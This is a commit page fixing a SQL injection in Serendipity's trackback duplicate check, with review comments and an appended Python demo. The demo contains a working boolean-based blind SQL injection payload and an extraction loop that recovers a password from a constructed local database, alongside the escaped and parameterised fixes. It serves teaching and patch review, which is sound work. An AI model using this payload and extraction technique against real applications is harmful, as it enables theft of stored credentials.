* Fix SQL injection for comment.php used in read-context.

      (Thanks to High-Tech Bridge SA Security Release Lab, Advisory HTB23092)
1 parent a6f37ee commit 87153991d06bc18fe4af05f97810487c4a340a92, garvinhicking committed May 16, 2012
Showing with 8 additions and 2 deletions.
  1. +6 −0 docs/NEWS
  2. +1 −1 include/functions_trackbacks.inc.php
  3. +1 −1 serendipity_config.inc.php
6 docs/NEWS
@@ -1,5 +1,11 @@
# $Id$
+Version 1.6.2 (May 16th, 2012)
+------------------------------------------------------------------------
+
+ * Fix SQL injection for comment.php used in read-context.
+ (Thanks to High-Tech Bridge SA Security Release Lab, Advisory HTB23092)
+
Version 1.6.1 (May 8th, 2012)
------------------------------------------------------------------------
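Review bot: the changelog entry at line 19 names comment.php, but the only code changed in this commit is include/functions_trackbacks.inc.php (add_trackback), so a reader scanning docs/NEWS cannot tell that the affected input is the trackback URL. Suggest naming the actual path, e.g. "Fix SQL injection in the trackback duplicate check (include/functions_trackbacks.inc.php)", and keeping the advisory reference as is.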
2 include/functions_trackbacks.inc.php
@@ -364,7 +364,7 @@ function add_trackback ($id, $title, $url, $name, $excerpt) {
if ($id>0) {
// first check, if we already have this trackback
- $comments = serendipity_fetchComments($id,1,'co.id',true,'TRACKBACK'," AND co.url='$url'");
+ $comments = serendipity_fetchComments($id,1,'co.id',true,'TRACKBACK'," AND co.url='" . serendipity_db_escape_string($url) . "'");
if (is_array($comments) && sizeof($comments) == 1) {
log_pingback("We already have that TRACKBACK!");
return 0; // We already have it!
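Review bot: the escape is applied at this one call site only, while serendipity_fetchComments still accepts a raw SQL fragment as its last argument and concatenates it into the query. Any other caller that builds that trailing condition from request data has the same problem, and nothing in this hunk prevents a future caller from repeating it. Consider escaping or parameterising inside serendipity_fetchComments (or giving it a structured filter instead of a string), and auditing the remaining callers of the function for the same " AND co.url='$url'" pattern.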
2 serendipity_config.inc.php
@@ -45,7 +45,7 @@
}
// The version string
-$serendipity['version'] = '1.6.1';
+$serendipity['version'] = '1.6.2';
// Setting this to 'false' will enable debugging output. All alpa/beta/cvs snapshot versions will emit debug information by default. To increase the debug level (to enable Smarty debugging), set this flag to 'debug'.
$serendipity['production'] = (preg_match('@\-(alpha|beta|cvs)@', $serendipity['version']) ? false : true);
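Review bot: the context comment at line 41 has a typo, "alpa/beta/cvs" should read "alpha/beta/cvs" to match the regex on the next line (`@\-(alpha|beta|cvs)@`). Version bump itself looks fine.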

1 comment on commit 8715399

@q--

Since the bug has been fixed for half a year or so, I don't think it can cause any harm to link a page at the Microsoft Developer Network that explains how blind SQL injection holes are actually exploited: Time-Based Blind SQL Injection with Heavy Queries.

Also note that tools to automate this process are widely available.
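The comment above points to time-based blind injection; the trackback check changed in this commit also offers a plainer oracle, because add_trackback returns "We already have that TRACKBACK!" exactly when the query matches one row. The following is an added example, not code from the Serendipity project or from the commenter, showing how that row-count difference turns the unescaped `co.url='$url'` fragment into a boolean-based blind extraction channel, and how the patched form closes it. Assumptions: SQLite stands in for MySQL, so `escape_string` models serendipity_db_escape_string with SQLite's quote doubling rather than the driver's actual escaping; the tables, rows and the `authors.password` value are constructed for the example; and a parameterised variant is included as the alternative a reviewer would prefer over per-call escaping.

```python
import sqlite3

# Constructed sample data (not from Serendipity): one entry with an existing
# trackback, one normal comment, and a secret the attacker wants to read.
SCHEMA = """
CREATE TABLE comments (id INTEGER PRIMARY KEY, entry_id INTEGER, type TEXT, url TEXT);
CREATE TABLE authors  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO comments VALUES (1, 1, 'TRACKBACK', 'http://example.org/post-1');
INSERT INTO comments VALUES (2, 1, 'NORMAL', '');
INSERT INTO authors  VALUES (1, 'admin', 's3cret');
"""

BASE = ("SELECT co.id FROM comments AS co "
        "WHERE co.entry_id = %d AND co.type = 'TRACKBACK' AND co.url = ")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_vulnerable(conn, entry_id, url):
    # Pre-patch pattern: the URL is interpolated straight into the WHERE clause.
    sql = (BASE % entry_id) + "'%s'" % url
    return conn.execute(sql).fetchall()


def escape_string(s):
    # Stand-in for serendipity_db_escape_string(): for SQLite, doubling the
    # quote is the correct escape (assumption; the real function uses the DB driver).
    return s.replace("'", "''")


def fetch_escaped(conn, entry_id, url):
    # Patched pattern: same string building, but the URL is escaped first.
    sql = (BASE % entry_id) + "'%s'" % escape_string(url)
    return conn.execute(sql).fetchall()


def fetch_parameterized(conn, entry_id, url):
    # Alternative the patch did not take: bind the value, never splice it.
    sql = ("SELECT co.id FROM comments AS co "
           "WHERE co.entry_id = ? AND co.type = 'TRACKBACK' AND co.url = ?")
    return conn.execute(sql, (entry_id, url)).fetchall()


def already_have_trackback(fetch, conn, entry_id, url):
    # The oracle add_trackback() exposes: exactly one matching row means
    # "We already have that TRACKBACK!" and the function returns 0.
    return len(fetch(conn, entry_id, url)) == 1


def extract_password(fetch, conn, length=6,
                     alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    # Boolean-based blind extraction through the duplicate-trackback oracle.
    # The payload closes the string, ORs in the attacker's condition and pins
    # the result to exactly one row (co.id = 1), so the oracle answers the
    # condition directly. A time-based variant would replace the row-count
    # difference with a heavy query or sleep; the principle is the same.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = ("x' OR (SELECT substr(password, %d, 1) FROM authors "
                       "WHERE id = 1) = '%s' AND co.id = 1 -- " % (pos, ch))
            if already_have_trackback(fetch, conn, 1, payload):
                recovered += ch
                break
        else:
            break  # no character matched: the oracle is closed (or alphabet incomplete)
    return recovered


if __name__ == "__main__":
    db = open_db()
    for name, fetch in (("vulnerable", fetch_vulnerable),
                        ("escaped", fetch_escaped),
                        ("parameterized", fetch_parameterized)):
        print("%-13s legit duplicate check: %s, leaked password: %r" % (
            name,
            already_have_trackback(fetch, db, 1, "http://example.org/post-1"),
            extract_password(fetch, db)))
```

Running it shows the unpatched variant leaking the constructed password one character at a time while the escaped and parameterised variants still answer the legitimate duplicate check and return nothing for the payload. The escaped form only holds as long as every caller remembers to escape; binding parameters removes that dependency on call-site discipline.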